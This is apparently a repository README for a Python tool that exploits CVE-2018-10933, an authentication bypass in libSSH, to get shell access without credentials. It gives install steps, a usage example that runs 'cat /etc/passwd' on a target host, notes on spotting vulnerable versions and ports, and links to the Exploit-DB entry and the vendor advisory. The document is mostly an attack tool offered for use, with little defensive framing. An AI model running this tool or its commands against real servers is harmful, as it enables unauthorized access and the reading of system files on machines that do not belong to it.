Spawn to shell without any credentials by using CVE-2018-10933 (LibSSH)
The developer of this repository has not created any items for sale yet. Need a bug fixed? Help with integration? A different license? Create a request here:
Spawn to shell without any credentials by using CVE-2018-10933
Exploit-DB : https://www.exploit-db.com/exploits/45638
Information about CVE-2018-10933 by libSSH : https://www.libssh.org/security/advisories/CVE-2018-10933.txt
Bugfix Release by libSSH : https://www.libssh.org/2018/10/16/libssh-0-8-4-and-0-7-6-security-and-bugfix-release/
// If paramiko==2.0.8 doesn't works try : pip install paramiko==2.4.2
pip install -r requirements.txt python libsshauthbypass.py --help
Example: python libsshauthbypass.py --host 0.0.0.0 --port 22 --command "cat /etc/passwd" --logfile newlogfile.log
If output is 0.7.5, 0.6.*, or lowest then the server is vulnerable.
If isn't then it's probably patched, truncated or not using libSSH.
( 22 Port is default, other ports like (2222, 3333, 4444) might be including libSSH )